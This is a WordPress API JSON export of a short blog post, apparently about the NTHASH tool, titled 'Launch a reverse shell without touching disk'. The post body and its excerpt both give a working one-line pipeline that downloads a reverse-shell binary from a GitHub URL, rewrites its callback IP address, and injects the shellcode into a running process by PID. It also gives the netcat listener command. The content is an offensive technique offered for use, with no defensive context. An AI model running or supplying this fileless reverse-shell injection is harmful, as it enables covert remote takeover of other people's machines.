{"id":2454,"date":"2023-07-31T15:21:11","date_gmt":"2023-07-31T13:21:11","guid":{"rendered":"https:\/\/labalec.fr\/erwan\/?p=2454"},"modified":"2023-07-31T16:29:03","modified_gmt":"2023-07-31T14:29:03","slug":"launch-a-reverse-shell-without-touching-disk","status":"publish","type":"post","link":"https:\/\/labalec.fr\/erwan\/?p=2454","title":{"rendered":"Launch a reverse shell without touching disk"},"content":{"rendered":"\n<p>NTHASH-win64 \/download2hexa \/input:https:%2f%2fgithub.com%2ferwan2212%2fNTHASH-FPC%2fraw%2fmaster%2frevshell64.bin| nthash-win64 \/replace \/old:7F000001 \/new:C0A801BE|nthash-win64 \/injectcodehexa \/pid:996<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>The above will, in 3 steps :<\/p>\n\n\n\n<p>-download a binary and convert it to its textual hexa form<\/p>\n\n\n\n<p>-replace the default outbound ip (127.0.0.1) to the real target ip (here 192.168.1.190)<\/p>\n\n\n\n<p>-inject the shellcode into the memory of the specified pid and execute it<\/p>\n\n\n\n<p>on the remote host : run nc -l -p 4444 (note that you could also replace 4444 with a port of your choice in the shell code)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>NTHASH-win64 \/download2hexa \/input:https:%2f%2fgithub.com%2ferwan2212%2fNTHASH-FPC%2fraw%2fmaster%2frevshell64.bin| nthash-win64 \/replace \/old:7F000001 \/new:C0A801BE|nthash-win64 \/injectcodehexa \/pid:996 The above will, in 3 steps : -download a binary and convert it to its textual hexa form -replace the default outbound ip (127.0.0.1) to the real target ip (here 192.168.1.190) -inject the shellcode into the memory of the specified pid and execute it on the <a href='https:\/\/labalec.fr\/erwan\/?p=2454' class='excerpt-more'>[&#8230;]<\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,118],"tags":[],"class_list":["post-2454","post","type-post","status-publish","format-standard","hentry","category-network","category-nthash","category-5-id","category-118-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"_links":{"self":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2454","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2454"}],"version-history":[{"count":3,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2454\/revisions"}],"predecessor-version":[{"id":2458,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2454\/revisions\/2458"}],"wp:attachment":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2454"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2454"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2454"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}